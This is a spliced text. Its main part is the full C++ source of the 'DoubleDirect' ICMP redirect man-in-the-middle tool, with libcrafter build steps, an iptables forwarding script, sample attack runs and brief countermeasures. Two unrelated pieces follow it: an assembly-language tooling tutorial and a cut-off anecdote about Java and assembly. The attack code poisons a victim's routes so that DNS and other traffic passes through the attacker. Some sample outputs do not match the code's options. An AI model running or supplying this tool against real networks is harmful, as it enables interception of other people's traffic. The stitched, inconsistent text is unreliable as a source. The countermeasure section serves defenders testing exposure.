* Use at your own risk * * Author: larry */ #include <iostream> #include <fstream> #include <string> #include <map> #include <vector> #include <getopt.h> #include <pthread.h> #include <crafter.h> static void printUsage(const std::string& progname) { std::cout << "[#] Usage: " << progname << " [options] " << std::endl; std::cout << "[#] Options: " << std::endl; std::cout << " -i, --interface Interface" << std::endl; std::cout << " -g, --new-gateway New gateway for the poisoned destination" << std::endl; std::cout << " -s, --source Source IP address of the ICMP message" << std::endl; std::cout << " -v, --victim Victim IP address" << std::endl; } // Local interface info typedef struct { // Broadcast struct in_addr bcast; // Network Mask struct in_addr nmask; } ifcfg_t; // Grabs local network interface information and stores in a ifcfg_t // defined in network.h, returns 0 on success -1 on failure int get_local_info(const std::string& interface, ifcfg_t *ifcfg) { int rsock = socket(PF_INET, SOCK_DGRAM, 0); struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interface.c_str(), IF_NAMESIZE); if((ioctl(rsock, SIOCGIFBRDADDR, &ifr)) == -1){ perror("ioctl():"); return -1; } memcpy(&ifcfg->bcast, &(*(struct sockaddr_in *)&ifr.ifr_broadaddr).sin_addr, 4); memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, interface.c_str(), IF_NAMESIZE); if((ioctl(rsock, SIOCGIFNETMASK, &ifr)) == -1){ perror("ioctl():"); return -1; } memcpy(&ifcfg->nmask.s_addr, &(*(struct sockaddr_in *)&ifr.ifr_netmask).sin_addr, 4); close(rsock); return 0; } std::string get_string_ip(in_addr nip) { char str[INET_ADDRSTRLEN]; inet_ntop(AF_INET, &(nip.s_addr), str, INET_ADDRSTRLEN); return std::string(str); } std::string get_string_ip(in_addr_t nip) { char str[INET_ADDRSTRLEN]; inet_ntop(AF_INET, &nip, str, INET_ADDRSTRLEN); return std::string(str); } // Discover hosts on the local LAN std::map<std::string, std::string> arp_ping_discover(const std::vector<std::string>& hosts, const 
std::string& iface) { /* Get the IP address associated to the interface */ std::string MyIP = Crafter::GetMyIP(iface); /* Get the MAC Address associated to the interface */ std::string MyMAC = Crafter::GetMyMAC(iface); /* --------- Common data to all headers --------- */ Crafter::Ethernet ether_header; ether_header.SetSourceMAC(MyMAC); ether_header.SetDestinationMAC("ff:ff:ff:ff:ff:ff"); Crafter::ARP arp_header; arp_header.SetOperation(Crafter::ARP::Request); arp_header.SetSenderIP(MyIP); arp_header.SetSenderMAC(MyMAC); /* ---------------------------------------------- */ /* Create a container of packet pointers to hold all the ARP requests */ std::vector<Crafter::Packet*> request_packets; /* Iterate to access each string that defines an IP address */ for(size_t i = 0 ; i < hosts.size() ; ++i) { arp_header.SetTargetIP(hosts[i]); /* Create a packet on the heap */ Crafter::Packet* packet = new Crafter::Packet; /* Push the layers */ packet->PushLayer(ether_header); packet->PushLayer(arp_header); /* Finally, push the packet into the container */ request_packets.push_back(packet); } std::vector<Crafter::Packet*> replies_packets(request_packets.size()); SendRecv(request_packets.begin(), request_packets.end(), replies_packets.begin(), iface, 0.1, 4, 48); std::vector<Crafter::Packet*>::iterator it_pck; int counter = 0; std::map<std::string, std::string> pair_addr; for(it_pck = replies_packets.begin() ; it_pck < replies_packets.end() ; it_pck++) { Crafter::Packet* reply_packet = (*it_pck); /* Check if the pointer is not NULL */ if(reply_packet) { /* Get the ARP layer of the replied packet */ Crafter::ARP* arp_layer = reply_packet->GetLayer<Crafter::ARP>(); /* Print the Source IP */ std::cout << "[@] Host " << arp_layer->GetSenderIP() << " is up with " "MAC address " << arp_layer->GetSenderMAC() << std::endl; pair_addr.insert(std::make_pair(arp_layer->GetSenderIP(), arp_layer->GetSenderMAC())); counter++; } } std::cout << "[@] " << counter << " hosts up. 
" << std::endl; /* Delete the container with the ARP requests */ for(it_pck = request_packets.begin() ; it_pck < request_packets.end() ; it_pck++) delete (*it_pck); /* Delete the container with the responses */ for(it_pck = replies_packets.begin() ; it_pck < replies_packets.end() ; it_pck++) delete (*it_pck); return pair_addr; } // Get gateway MAC static std::string getGatewayMac(const std::string& iface) { // Set default values std::string gw_ip("0.0.0.0"), gw_mac("00:00:00:00:00:00"); char a[16]; char buf[1024]; uint32_t b, c, r; FILE *route_fd = fopen("/proc/net/route", "r"); if (route_fd == NULL) return gw_mac; fseek(route_fd, 0, 0); while (fgets(buf, sizeof(buf), route_fd)) { r = sscanf(buf, "%s %x %x", a, &b, &c); if ((r == 3) && (strcmp(a, iface.c_str()) == 0) && (b == 0)) { struct in_addr in; in.s_addr = c; gw_ip = std::string(inet_ntoa(in)); break; } } fclose(route_fd); std::string ip_addr_arp; std::string hw_addr_arp; std::string device_arp; std::string dummy; std::ifstream arp_table ("/proc/net/arp"); std::string line; std::getline (arp_table,line); typedef std::vector<std::pair<std::string, std::string> > addr_pair_cont; addr_pair_cont addr_pairs; if (arp_table.is_open()) { while ( arp_table.good() ) { arp_table >> ip_addr_arp; arp_table >> dummy; arp_table >> dummy; arp_table >> hw_addr_arp; arp_table >> dummy; arp_table >> device_arp; // Check if this entry is the gateway if(ip_addr_arp == gw_ip) { gw_mac = hw_addr_arp; break; } } } arp_table.close(); return gw_mac; } // Get gateway IP static std::string getGatewayIp(const std::string& iface) { std::string gw_addr(""); char a[16]; char buf[1024]; uint32_t b, c, r; FILE *route_fd = fopen("/proc/net/route", "r"); if (route_fd == NULL) return ""; fseek(route_fd, 0, 0); while (fgets(buf, sizeof(buf), route_fd)) { r = sscanf(buf, "%s %x %x", a, &b, &c); if ((r == 3) && (strcmp(a, iface.c_str()) == 0) && (b == 0)) { struct in_addr in; in.s_addr = c; gw_addr = std::string(inet_ntoa(in)); break; } } 
fclose(route_fd); return gw_addr; } // Structure to hold parameters of the ICMP redirect attack struct IcmpRedirParameters { // Interface std::string _interface; // Victim IP address std::string _victim; // Destination we want to poison std::string _destination; // Net gateway std::string _new_gateway; // Source of the ICMP redirect message std::string _source_ip; }; // Attack finished bool finish = false; // Global Sniffer pointer std::vector<Crafter::Sniffer*> sniffers; // List of poisoned entries (one for each destination) std::map<std::string, IcmpRedirParameters*> poisoned_entries; pthread_mutex_t entries_mutex; // Function for handling a CTRL-C void ctrl_c(int dummy) { // Signal finish of the attack finish = true; // Cancel the sniffing thread for(size_t i = 0 ; i < sniffers.size() ; ++i) { sniffers[i]->Cancel(); } } Crafter::Packet* createIcmpPacket(const IcmpRedirParameters* parameters) { // Create an IP header Crafter::IP ip_header; ip_header.SetSourceIP(parameters->_source_ip); ip_header.SetDestinationIP(parameters->_victim); // Create an ICMP header Crafter::ICMP icmp_header; // ICMP redirect message icmp_header.SetType(Crafter::ICMP::EchoRedirect); // Code for redirect to host icmp_header.SetCode(1); // Set gateway (put attacker's IP here) icmp_header.SetGateway(parameters->_new_gateway); // Original packet, this should contain the address we want to poison Crafter::IP orig_ip_header; orig_ip_header.SetSourceIP(parameters->_victim); orig_ip_header.SetDestinationIP(parameters->_destination); // Create an UDP header. 
This could be any protocol (ICMP, UDP, TCP, etc) Crafter::UDP orig_udp_header; orig_udp_header.SetDstPort(53); orig_udp_header.SetSrcPort(Crafter::RNG16()); // Craft the packet and sent it every 3 seconds Crafter::Packet* redir_packet = new Crafter::Packet(ip_header / icmp_header / orig_ip_header / orig_udp_header); // Return created packet return redir_packet; } // Function to send a couple of ICMP redirect messages void* icmpRedirectAttack(void* arg) { // Get attack parameters const IcmpRedirParameters* parameters = reinterpret_cast<const IcmpRedirParameters*>(arg); // Create packet Crafter::Packet* redir_packet = createIcmpPacket(parameters); // Send 3 packets for(int i = 0 ; i < 3 ; ++i) { redir_packet->Send(); sleep(3); } return 0; } void startIcmpRedirectAttack(IcmpRedirParameters& parameters) { pthread_t tid; pthread_create(&tid, 0, icmpRedirectAttack, reinterpret_cast<void*>(&parameters)); pthread_detach(tid); } void startIcmpRedirectAttack(IcmpRedirParameters& parameters, const std::string& destination) { IcmpRedirParameters* new_parameters = new IcmpRedirParameters(parameters); new_parameters->_destination = destination; // Save it in global list of poisoned entries pthread_mutex_lock(&entries_mutex); poisoned_entries.insert(std::make_pair(new_parameters->_victim + ":" + new_parameters->_destination, new_parameters)); pthread_mutex_unlock(&entries_mutex); // Start attack startIcmpRedirectAttack(*new_parameters); } void DnsWatcher(Crafter::Packet* sniff_packet, void* user) { IcmpRedirParameters* parameters = reinterpret_cast<IcmpRedirParameters*>(user); /* Get the Ethernet Layer */ Crafter::Ethernet* ether_layer = GetEthernet(*sniff_packet); /* Get the IP layer */ Crafter::IP* ip_layer = GetIP(*sniff_packet); /* Get the UDP layer */ Crafter::UDP* udp_layer = GetUDP(*sniff_packet); /* Checks if the source MAC is not mine */ if(ether_layer->GetSourceMAC() != getGatewayMac(parameters->_interface)) { // Checks if the packet is coming from the server 
if(ip_layer->GetSourceIP() == parameters->_victim) { // Get the RawLayer Crafter::RawLayer* raw_layer = GetRawLayer(*sniff_packet); // Create a DNS header Crafter::DNS dns_req; // And decode it from a raw layer dns_req.FromRaw(*raw_layer); // Check if the DNS packet is a query and there is a question on it. if( (dns_req.GetQRFlag() == 0) && (dns_req.Queries.size() > 0) ) { // Get the host name to be resolved std::string hostname = dns_req.Queries[0].GetName(); // Print information std::cout << "[@] Query detected -> Host Name = " << hostname << std::endl; } // ...or coming from the server (better) } else if (ip_layer->GetDestinationIP() == parameters->_victim) { // Get the RawLayer Crafter::RawLayer* raw_layer = GetRawLayer(*sniff_packet); // Create a DNS header Crafter::DNS dns_res; // And decode it from a raw layer dns_res.FromRaw(*raw_layer); // Check if we have responses on the DNS packet. if(dns_res.Answers.size() > 0) { for(size_t i = 0 ; i < dns_res.Answers.size() ; ++i) { if(dns_res.Answers[i].GetType() == Crafter::DNS::TypeA) { // Get the host name to be resolved std::string ip = dns_res.Answers[i].GetRData(); // Print information std::cout << "[@] Response detected -> IP address = " << ip << std::endl; // Poison this address startIcmpRedirectAttack(*parameters, ip); } } } } } } // Function to poison a fixed list of DNS servers void* poisonDnsServers(void* user) { IcmpRedirParameters* redirect_parameters = reinterpret_cast<IcmpRedirParameters*>(user); while(not finish) { // HardCode DNS servers we want to redirect to our machine startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8"); // GOOGLE startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4"); // GOOGLE startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222"); // OpenDNS startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220"); // OpenDNS sleep(10); } return 0; } int main(int 
argc, char* argv[]) { // Print header std::cout << "[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****" << std::endl; // Program name std::string progname(argv[0]); // Check arguments if(argc < 2) { printUsage(progname); return 1; } signal(SIGINT, ctrl_c); signal(SIGTERM, ctrl_c); // Parameters std::string interface, victim_ip, new_gateway, source_ip; // Victim's IPs std::vector<std::string> victims; int c; // Define options static struct option long_options[] = { {"interface", 1, 0, 'i'}, {"new-gateway", 1, 0, 'g'}, {"victim", 1, 0, 'v'}, {"source", 1, 0, 's'}, {NULL, 0, 0, 0} }; int option_index = 0; while ((c = getopt_long(argc, argv, "i:v:g:s:",long_options, &option_index)) != -1) { switch (c) { case 'i': interface = std::string(optarg); break; case 'v': victim_ip = std::string(optarg); break; case 'g': new_gateway = std::string(optarg); break; case 's': source_ip = std::string(optarg); break; case '?': printUsage(progname); return 1; break; default: printUsage(progname); return 1; } } if(interface.size() == 0) { std::cout << "[#] Error: Missing interface " << std::endl; printUsage(progname); return 1; } if(victim_ip.size() == 0) { std::cout << "[#] Missing victim IP address. 
Poisoning the entire network" << std::endl; // Total hosts std::vector<std::string> total_hosts; // Get local information of the interface ifcfg_t local_info; get_local_info(interface, &local_info); // Get first IP address in_addr_t first_ip = local_info.nmask.s_addr & local_info.bcast.s_addr; in_addr_t delta_net = ~ntohl(local_info.nmask.s_addr); // Create list of ignored IPs addresses std::set<std::string> ignored_ips; ignored_ips.insert(getGatewayIp(interface)); ignored_ips.insert(Crafter::GetMyIP(interface)); ignored_ips.insert(get_string_ip(first_ip)); // Loop over IPs addresses on the network for(size_t i = 0 ; i < delta_net ; ++i) { // Get destination IP address in_addr_t nip = ntohl(ntohl(first_ip) + i); std::string ip = get_string_ip(nip); // Only attack IPs which are not on the ignore list if(ignored_ips.find(ip) == ignored_ips.end()) { total_hosts.push_back(ip); } } // Get hosts UP std::map<std::string,std::string> host_up = arp_ping_discover(total_hosts, interface); // Set as targets only alive hosts for(std::map<std::string,std::string>::const_iterator it = host_up.begin() ; it != host_up.end() ; ++it) { victims.push_back((*it).first); } } else { // Push only one victim victims.push_back(victim_ip); // Print attack's parameters std::cout << "[#] Attack parameters : " << std::endl; std::cout << " [+] Interface : " << interface << std::endl; std::cout << " [+] Victim IP address : " << victim_ip << std::endl; } // Try to get the IP of the gateway std::string gw_ip = getGatewayIp(interface); // By default the source IP address of the message is the current gateway if(source_ip.length() == 0) source_ip = gw_ip; if(gw_ip.size() == 0) { std::cout << "[#] Error: Interface " << interface << " don't have an associated gateway" << std::endl; return 1; } // Get MAC address of the gateway std::string gw_mac = getGatewayMac(interface); std::cout << "[#] Gateway parameters : " << std::endl; std::cout << " [+] Gateway IP address : " << gw_ip << std::endl; std::cout << 
" [+] Gateway MAC address : " << gw_mac << std::endl; std::string my_ip = Crafter::GetMyIP(interface); // By default set attacker's IP as the new gateway if(new_gateway.length() == 0) new_gateway = my_ip; std::cout << "[#] My parameters : " << std::endl; std::cout << " [+] My IP address : " << my_ip << std::endl; for(size_t i = 0 ; i < victims.size() ; ++i) { // Get victim IP std::string victim = victims[i]; // Setup attacks parameters IcmpRedirParameters* redirect_parameters = new IcmpRedirParameters; // Interface redirect_parameters->_interface = interface; // Victim IP address redirect_parameters->_victim = victim; // Net gateway redirect_parameters->_new_gateway = new_gateway; // Source of the ICMP redirect message redirect_parameters->_source_ip = source_ip; pthread_mutex_init(&entries_mutex, 0); pthread_t dns_poison_id; pthread_create(&dns_poison_id, 0, poisonDnsServers, reinterpret_cast<void*>(redirect_parameters)); pthread_detach(dns_poison_id); // Create a sniffer Crafter::Sniffer* sniff = new Crafter::Sniffer("udp and host " + victim + " and port 53", interface, DnsWatcher); // Now start the main sniffer loop void* sniffer_arg = static_cast<void*>(redirect_parameters); sniff->Spawn(-1, sniffer_arg); // Save sniffer reference sniffers.push_back(sniff); } // Wait while(not finish) sleep(1); std::cout << "[#] Finishing ICMP redirect attack..." << std::endl; std::cout << "[#] Fixing route table on victim's machine. 
Number of poisoned entries = " << poisoned_entries.size() << std::endl; // Threads std::vector<Crafter::Packet*> fix_packets; // Protect entries pthread_mutex_lock(&entries_mutex); // Loop over all entries for(std::map<std::string, IcmpRedirParameters*>::const_iterator it = poisoned_entries.begin() ; it != poisoned_entries.end() ; ++it) { // Get parameters IcmpRedirParameters* parameters = it->second; std::cout << " [+] Fixing table for destination : " << it->first << std::endl; parameters->_source_ip = parameters->_new_gateway; parameters->_new_gateway = getGatewayIp(parameters->_interface); // Push packet fix_packets.push_back(createIcmpPacket(parameters)); } // Send all the packets, 3 times for(int i = 0 ; i < 3 ; ++i) { Crafter::Send(fix_packets.begin(), fix_packets.end(), interface, 16); sleep(3); } pthread_mutex_unlock(&entries_mutex); pthread_mutex_destroy(&entries_mutex); std::cout << "[#] Finishing fixing route table on victim's machine" << std::endl; return 0; }

To compile and run the code in this post you will need libcrafter (https://code.google.com/p/libcrafter/) installed on your system. Libcrafter is an open source, multi-platform library written in C++ and released under the new BSD license. It provides a high-level interface to craft, decode and sniff network packets, which makes it easy to create networking utilities without dealing with low-level details. To compile it on your GNU/Linux or Mac OS X system, execute the following commands:

$ git clone https://github.com/pellegre/libcrafter
$ cd libcrafter/libcrafter
$ ./autogen.sh
$ make
$ sudo make install
$ sudo ldconfig

Note that you need libpcap installed on your system before configuring libcrafter (apt-get install libpcap-dev).

DoubleDirect: Full-Duplex ICMP Redirect Attack

– Scenario
Gateway = 192.168.1.1
Attacker (Ubuntu) = 192.168.1.105
Victim (Galaxy S4) = 192.168.1.101

– Victim’s machine
First we need to check if the device accepts redirects.
In my case (Galaxy S4), the accept_redirects bit was enabled by default:

# cat /proc/sys/net/ipv4/conf/all/accept_redirects
1

If ICMP Redirect is not enabled and you want to test this attack, execute:

# echo 1 > /proc/sys/net/ipv4/conf/all/accept_redirects

– Attacker’s machine
Finally, on the attacker’s machine we need to tell the kernel a few things so the attack works correctly. The following commands should be executed on the attacker’s machine (as root):

To forward IP packets:
# echo 1 > /proc/sys/net/ipv4/ip_forward

Don’t send redirects. This is very important: we need to tell the attacker’s kernel not to send redirects:
# echo 0 > /proc/sys/net/ipv4/conf/all/send_redirects

– Attacking the device
Compile doubledirect_poc.cpp:

$ g++ doubledirect_poc.cpp -o doubledirect_poc -lcrafter
$ ./doubledirect_poc
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Usage: ./doubledirect_poc [options]
[#] Options:
 -i, --interface Interface
 -v, --victim Victim IP address
 -d, --destination Destination address to poison

Instead of poisoning a LAN ARP entry, we poison a remote IP address when it is accessed by the victim. In doing so, we trick the victim into sending IP packets intended for a particular destination through our device instead of the real gateway. When the device sends an IP packet with destination 8.8.8.8, it should use the gateway (192.168.1.1). Now let’s poison that entry. On the attacker machine execute:

$ sudo ./doubledirect_poc -i wlan0 -v 192.168.1.101 -d 8.8.8.8
[#] Attack parameters :
 [+] Interface : wlan0
 [+] Victim IP address : 192.168.1.101
 [+] Destination to poison : 8.8.8.8
[#] Gateway parameters :
 [+] Gateway IP address : 192.168.1.1
 [+] Gateway MAC address : *:*:AE:51
[#] My parameters :
 [+] My IP address : 192.168.1.105

We can see how the entry for 8.8.8.8 is poisoned with our IP address (192.168.1.105).
When the victim sends a packet with destination 8.8.8.8, it will use our computer as the gateway for that packet. This allows us to sniff all the traffic to that destination (a classic man-in-the-middle attack). Once we have all the DNS traffic forwarded transparently through our computer, we can send an ICMP Redirect packet for every IP address we find in the sniffed DNS replies. We are sniffing not only the victim’s DNS traffic, but also the traffic to every address that is resolved through it.

To test if you are vulnerable to DoubleDirect, first execute the following lines of shell code to set up iptables and IP forwarding properly:

# cat iptables_double_direct.sh
#!/bin/sh
if [ $# -lt 1 ]; then
 echo "[@] Usage: `basename ${0}` "
 echo "[@] Example: `basename ${0}` wlan0"
 exit 0
fi
INTERFACE=${1}
echo 1 > /proc/sys/net/ipv4/ip_forward
echo 0 > /proc/sys/net/ipv4/conf/$INTERFACE/send_redirects
iptables --flush
iptables --zero
iptables --delete-chain
iptables -F -t nat
iptables --append FORWARD --in-interface $INTERFACE --jump ACCEPT
iptables --table nat --append POSTROUTING --out-interface $INTERFACE --jump MASQUERADE

# ./iptables_double_direct.sh wlan0

Finally, execute the Zimperium DoubleDirect Audit tool:

# ./doubledirect_poc -i wlan0 -v 192.168.1.101
[#] ***** ZIMPERIUM - DoubleDirect :: Full-Duplex ICMP Redirect Audit Tool *****
[#] Attack parameters :
 [+] Interface : wlan0
 [+] Victim IP address : 192.168.1.101
[#] Gateway parameters :
 [+] Gateway IP address : 192.168.2.1
 [+] Gateway MAC address : 00:1f:*:*
[#] My parameters :
 [+] My IP address : 192.168.2.103

The DNS servers are hard-coded inside the code (line 397, doubledirect_poc.cpp file).
You can add any host for the initial ICMP Redirect packets there:

// Hardcoded DNS servers we want to redirect to our machine
startIcmpRedirectAttack(*redirect_parameters, getGatewayIp(redirect_parameters->_interface)); // Gateway
startIcmpRedirectAttack(*redirect_parameters, "8.8.8.8"); // GOOGLE
startIcmpRedirectAttack(*redirect_parameters, "8.8.4.4"); // GOOGLE
startIcmpRedirectAttack(*redirect_parameters, "208.67.222.222"); // OpenDNS
startIcmpRedirectAttack(*redirect_parameters, "208.67.220.220"); // OpenDNS

Countermeasures

iOS, Android and Mac OS X usually accept ICMP Redirect packets by default. To test if your OS X system is vulnerable to DoubleDirect, run the following command:

sysctl net.inet.ip.redirect | grep ": 1" && echo "DoubleDirect: VULNERABLE" || echo "DoubleDirect: SAFE"

To disable ICMP Redirect on a Mac (as root):

# sysctl -w net.inet.ip.redirect=0

On the mobile side, most Android devices (Galaxy series) have the accept_redirects field enabled by default. To disable it, you need to root your device and execute:

# echo 0 > /proc/sys/net/ipv4/conf/all/accept_redirects

Who is at risk?

– iOS: The attack works on the latest versions of iOS, including iOS 8.1.1.
– Android: Most Android devices that we have tested, including Nexus 5 + Lollipop.
– Mac: Mac OS X Yosemite is vulnerable.

Most GNU/Linux and Windows desktop operating systems do not accept ICMP Redirect packets.
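As a rough illustration of the Linux/Android check described above, the following C++ sketch reads an accept_redirects file under /proc and reports whether ICMP Redirects are accepted. It is only a sketch under stated assumptions: the names RedirectSetting, parseRedirectSetting, readRedirectSetting and reportRedirectSetting are hypothetical helpers invented for this example (they are not part of doubledirect_poc.cpp), and it looks at a single file only, whereas the kernel's effective behavior also depends on the per-interface value and on other settings.

```cpp
#include <fstream>
#include <iostream>
#include <string>

// Hypothetical helper type for this sketch: state of an accept_redirects file.
enum class RedirectSetting { Enabled, Disabled, Unknown };

// Interpret the text read from an accept_redirects file ("0" or "1",
// usually followed by a newline). Anything else is reported as Unknown.
RedirectSetting parseRedirectSetting(const std::string& contents) {
    const std::size_t first = contents.find_first_not_of(" \t\r\n");
    if (first == std::string::npos) return RedirectSetting::Unknown;
    const std::size_t last = contents.find_last_not_of(" \t\r\n");
    const std::string value = contents.substr(first, last - first + 1);
    if (value == "0") return RedirectSetting::Disabled;
    if (value == "1") return RedirectSetting::Enabled;
    return RedirectSetting::Unknown;
}

// Read the setting for one configuration entry ("all", "wlan0", ...).
// Returns Unknown if the file cannot be opened (for example, not on Linux).
RedirectSetting readRedirectSetting(const std::string& iface) {
    const std::string path =
        "/proc/sys/net/ipv4/conf/" + iface + "/accept_redirects";
    std::ifstream file(path.c_str());
    if (!file.is_open()) return RedirectSetting::Unknown;
    std::string contents;
    std::getline(file, contents);
    return parseRedirectSetting(contents);
}

// Print a one-line verdict, mirroring the wording of the OS X check.
void reportRedirectSetting(const std::string& iface) {
    switch (readRedirectSetting(iface)) {
        case RedirectSetting::Enabled:
            std::cout << "DoubleDirect: VULNERABLE (" << iface << ")" << std::endl;
            break;
        case RedirectSetting::Disabled:
            std::cout << "DoubleDirect: SAFE (" << iface << ")" << std::endl;
            break;
        case RedirectSetting::Unknown:
            std::cout << "DoubleDirect: UNKNOWN (" << iface << ")" << std::endl;
            break;
    }
}
```

Calling reportRedirectSetting("all") from a small main() gives the same kind of answer as the cat command shown earlier, and it can be repeated for a specific interface such as "wlan0".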
-
To program in Assembly, you will need some software, namely an assembler and a code editor, as we have seen in chapter 1. An assembler takes the written assembly code and converts it into machine code. It comes with a linker that links the assembled files and produces an executable from them (.exe extension). Sometimes a program crashes because a programming bug prevents it from continuing its execution, or even from running at all. Fortunately, there is a program called the debugger that runs other programs, allowing its user to exercise some degree of control over them and to examine them when things go amiss. Another tool, as you may have guessed, is the disassembler, which translates executable code into assembly language, the inverse operation to that of an assembler. Finally, there is a tool called a resource compiler; I’m going to explain it later in this saga. For each tool, there is quite a good selection that can do the job very well.

Code Editor: (Notepad++, UltraEdit, VIM, …)
Assemblers: (JWasm, GoAsm, yASM, Fasm, …)
Linker: (JWlink, Link, PoLink, …)
Resource Compiler: (Microsoft RC, PoRC, GoRC, …)
Debugger: (OllyDBG, Immunity Debugger, WinDBG, SoftICE, …)
Disassembler: (IDA Pro, Win32Dasm, HDasm, …)
Integrated Development Environment (IDE): (All-In-One utility, Source Code Editor + Assembler + Linker + Resource Compiler)

Assembler / Linker:

It goes without saying that MASM, originally by Microsoft, is the king of the hill. The real problem with MASM is its license restrictions, and also that it is not constantly updated, but only on an as-needed basis by Microsoft. JWasm fixes it all:

JWasm is free, has no artificial license restrictions, and can be used to create binaries for any OS.
JWasm’s source is open. Hence JWasm is able to run – natively – on Windows, DOS, Linux, FreeBSD and OS/2.
More output formats are supported (Bin, ELF).
Optionally, very small object modules can be created.
Better support for Open Watcom, for example the register-based calling convention.
JWasm is faster than MASM.

We will use PoLink as a linker. We can use Microsoft’s linker (LINK) too; there is only one difference between them: PoLink accepts RES files for resources, whereas the Microsoft linker wants an OBJ file. Another difference is that PoLink can produce smaller EXEs, given the right switches, and it is more up to date.

Debugger/Disassembler:

Now we will look at some of the differences between several of the most widely used debuggers and disassemblers. This is by no means exhaustive. Consider it a brief overview to give people new to assembly/reversing a “quick start” guide. Before we look at IDA Pro (Free), Immunity Debugger (ImmDBG) and Olly Debugger (OllyDBG), we must first fully understand the differences between a debugger and a disassembler. I have heard these terms used interchangeably, but they are two separate tools. A disassembler takes a binary and breaks it down into human-readable assembly. With a disassembler you can take a binary and see exactly how it functions (static analysis), whereas with a debugger we can step through, break and edit the assembly while it is executing (dynamic analysis).

IDA Pro (proprietary software, free version available)

Honestly, IDA Pro should be in a category by itself. It is an interactive, extensible disassembler and debugger. IDA is also programmable, with a complete development environment. This allows users to build plug-ins and scripts to assist them in their research. The standard version of IDA is expensive and gives you support for over 50 families of processors. But for someone who is new to reversing/disassembling, the free version will do just fine. One of the main advantages IDA has over Immunity Debugger (ImmDBG) and Olly Debugger (OllyDBG) is its platform support: IDA is available for Windows and Linux as well as Mac OS X.
Olly Debugger (OllyDBG)

OllyDBG is a user-friendly, very small and portable 32-bit user-mode debugger with an intuitive interface. As you gain experience, you’ll be able to discover how powerful OllyDBG is. OllyDBG knows most of the Windows APIs when you’re examining your binary, and it will show you what each register parameter means. Unfortunately, it does not understand Microsoft’s symbol file format or debug information.

Immunity Debugger (ImmDBG)

Immunity Debugger is very similar to OllyDBG. The only new features ImmDBG offers over Olly are Python scripting and function graphing, both of which are already supported in Olly through plug-ins. There are also plug-ins to fix the numerous bugs Olly has.

Integrated Development Environment:

There are also a thousand IDEs, and all of them are quite awesome.

Once you have the JWasm assembler, the MASM32 SDK, and the EasyCode IDE, extract them into a default folder on your hard disk. You don’t actually need the other tools for this part; keep them for later.

Unzip the MASM32 SDK package and run install.exe. A series of message boxes will pop up; keep hitting OK until it asks to start extracting the package. Again, click OK until it says that the installation has run to completion and appears to have run correctly.

Unzip the EasyCode.zip file and the ‘EasyCode.Ms’ folder will be created. Place the whole EasyCode.Ms folder anywhere you like on one of your hard disks. If the folder already exists, overwrite it. Close all applications, open the EasyCode.Ms folder and run the ‘Settings.exe’ program (if possible, as an Administrator). Choose the desired options and press the ‘OK’ button.

Now extract the JWasm archive, locate ‘JWasm.exe’, and copy it into the ‘C:\masm32\bin’ directory.

Run the ‘EasyCode.exe’ file (located in the ‘EasyCode.Ms\Bin’ folder, or on the desktop) and set the paths for the Masm32 files. To do so, use the ‘Tools–>Settings’ menu.
Go to the Compiler/Link tab and set up the paths as below: Apply the changes, then press OK.

Now that we have our tools working like a charm, let’s begin programming! This is the most commonly written program in the world, the “Hello World!” program. Press CTRL+N for a new project, choose classic executable file, and uncheck all the options. Then copy and paste the following code into your IDE:

;-----------------------------------------------
; MessageBox.asm - Displays "Hello, 0ld W0rld !" in a message box
;-----------------------------------------------
.386

.Data
MsgBoxCaption DB "Simple Message Box",0
MsgBoxText DB "Hello, 0ld W0rld !",0

.Code
start:
    push MB_OK + MB_ICONASTERISK ; uType: OK button and information icon
    push offset MsgBoxCaption    ; lpCaption: title of the message box
    push offset MsgBoxText       ; lpText: text shown in the message box
    push NULL                    ; hWnd: no owner window
    call MessageBox
    invoke ExitProcess, NULL
End start

Press F7 to build the project; you’ll be asked to save it. First of all, I recommend you create a new folder called ‘Projects’ in EasyCode.Ms and save all your projects in it. Afterward, create a new folder in the ‘Projects’ directory, call it myFirstProgram, and save all files there:

myFirstProgram.ecp (The Project File).
myFirstProgram.asm (The Assembly code file).

Press CTRL+F5 to run it. Congratulations, you have just run your first assembly code!

Take your time to discover your favorite IDE and its features. Also, keep in mind that IDA Pro alone would need a book or a whole chapter to be presented as it deserves, and the same goes for OllyDBG and ImmDBG. In this chapter, the primary goal was to get you familiar with some assembly and debugging/disassembling tools. I assume you understand that the syntax of assembly code differs slightly from one assembler to another; nevertheless, different assemblers will generate the same machine code in the end.
-
As usual, last Friday night I was hanging out with friends, picking up girls in the street and chasing after them. One night, I had a strange feeling just like something was gonna happen. But I was not sure if it’s gonna be good or bad. My closest friend, Esp!oNLerAvaGe!, came out with me. I dressed up and we were ready. We took a taxi to Aîn Diab, a very active place in Casablanca, Morocco. While walking, I saw a very gorgeous girl, everybody was looking at her, and I decided to give myself a chance and have a talk with her. On my way to her, I heard someone who said loudly: “JAVA IS AWESOME”. When I heard that, I lost my attention span, and I kept my thoughts fixed on “JAVA” & “AWESOME”. Not because I have something with Java, but because at that moment, I really wasn’t expecting someone to say such a thing. I kept walking towards the girl and she was gazing at me. I said: Me: Hi, could I have a word with you? Her: Hi! .. ohhh yeah ! Me: I’ve seen you leaving the cafe, you look so adorable and I want to ask you something… Her: Ooh .. Wh..a…t kind of question is th.a…t ? In the meantime, there was a bunch of guys trying to figure out something. I was kinda out of it, looking at the girl but listening to the guys. Then, I heard : “YOU WRITE ONCE AND RUN EVERYWHERE.” I said to myself, shouldn’t it be “write once, debug everywhere“? Afterward, he said: “JAVA IS THE FUTURE,” AND HE ASKS HIS FRIENDS TO FORGET ABOUT ASSEMBLY. I decided to intervene. I said: Sorry, do you know what is Assembly? The guy replied: mm… not much actually, do you? I said oh yes. Him: can I ask you some questions then? Then I smiled, asked the girl to join us, and the conversation started. What is Assembly Language ? Assembly language programming is referred to as low-level programming because each assembly language instruction performs a much lower-level task compared to an instruction in a high-level language. 
As a consequence, to perform the same task, assembly language code tends to be much larger than the equivalent high-level language code.

So Assembly Language is Machine Language?

